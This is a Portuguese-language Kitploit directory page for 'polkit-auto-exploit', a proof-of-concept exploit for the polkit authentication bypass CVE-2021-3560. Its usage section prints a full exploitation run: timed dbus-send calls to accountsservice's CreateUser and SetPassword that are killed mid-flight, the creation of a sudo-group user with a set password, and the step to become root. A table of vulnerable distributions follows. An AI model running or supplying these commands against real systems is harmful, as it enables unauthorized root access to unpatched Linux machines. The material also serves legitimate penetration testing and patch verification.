Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
polkit-auto-exploit — PoC de Exploração Automática para Polkit CVE-2021-3560 | Kitploit
Ferramentas/GitHubGitHub/aancw/polkit-auto-exploit
Autenticação e AutorizaçãoEscalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoTestes de Penetração
GitHubaancw/polkit-auto-exploit

polkit-auto-exploit

PoC de Exploração Automática para Polkit CVE-2021-3560

Ver Repositório
54há 5 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

polkit-auto-exploit

PoC de Exploração Automática para Polkit CVE-2021-3560

Resumo

CVE-2021-3560 é uma bypass de autenticação no polkit, que permite que um usuário sem privilégios chame métodos privilegiados usando DBus. Neste exploit, chamaremos 2 métodos privilegiados fornecidos pelo accountsservice (CreateUser e SetPassword), o que nos permite criar um usuário privilegiado, definir uma senha para ele e, no final, fazer login como o usuário criado e então elevar para root. https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/

Uso

root@kitploit:~
ubuntu@ubuntu2004:~/polkit-auto-exploit$ ./polkit-auto-exploit -u adminhs -p admin1 -f admin
[===] Auto Exploitation PoC for Polkit CVE-2021-3560 by Petruknisme [===]
[+] Current User: ubuntu
[+] Variable for Polkit Configuration
[*] Username : adminhs
[*] Password : admin1
[*] Fullname : admin
[+] Sending create user command to determine time execution
[*] Execution time: 0.018076ms
[+] Time to killing dbus-send setting to 0.009038ms
dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:adminhs string:'admin' int32:1 & sleep 0.009038s ; kill $!
..................
[+] GOTCHAAA! User adminhs is created with sudo member group
[+] Getting UID from user: 1015
[+] Creating password with OpenSSL
$5$wwCpZi2.onsiKa6b$B/OovlhfvFWs65EdYnk/1sL.sYSzfPXd1s6ZpurHNr0
[+] Triggering polkit to create password for adminhs
dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1015 org.freedesktop.Accounts.User.SetPassword string:'$5$wwCpZi2.onsiKa6b$B/OovlhfvFWs65EdYnk/1sL.sYSzfPXd1s6ZpurHNr0' string:admin & sleep 0.009038s ; kill $!
Failed to execute command: echo admin1 | su -c id adminhs
uid=1015(adminhs) gid=1015(adminhs) groups=1015(adminhs),27(sudo)

[+] GOTCHAAA! Success login with User adminhs & password: admin1
[+] You can login to root using su with user and password created before: su -c 'sudo su' adminhs

Testado

  • Ubuntu 20.04(policykit-1/focal,now 0.105-26ubuntu1)

Informação

Qualquer sistema que tenha a versão 0.113 (ou posterior) do polkit instalada é vulnerável. Isso inclui distribuições populares como RHEL 8 com a versão 0.115 do polkit e Ubuntu 20.04 com a versão 0-105-26 (fork do polkit para Debian)

Distribuições Vulneráveis

Licença

MIT License

Baixar ferramenta
DistribuiçãoVulnerável?
RHEL 7Não
RHEL 8 Sim
Fedora 20 (ou anterior)Não
Fedora 21 (ou posterior) Sim
Debian 10 (“buster”)Não
Debian testing (“bullseye”) Sim
Ubuntu 18.04Não
Ubuntu 20.04 Sim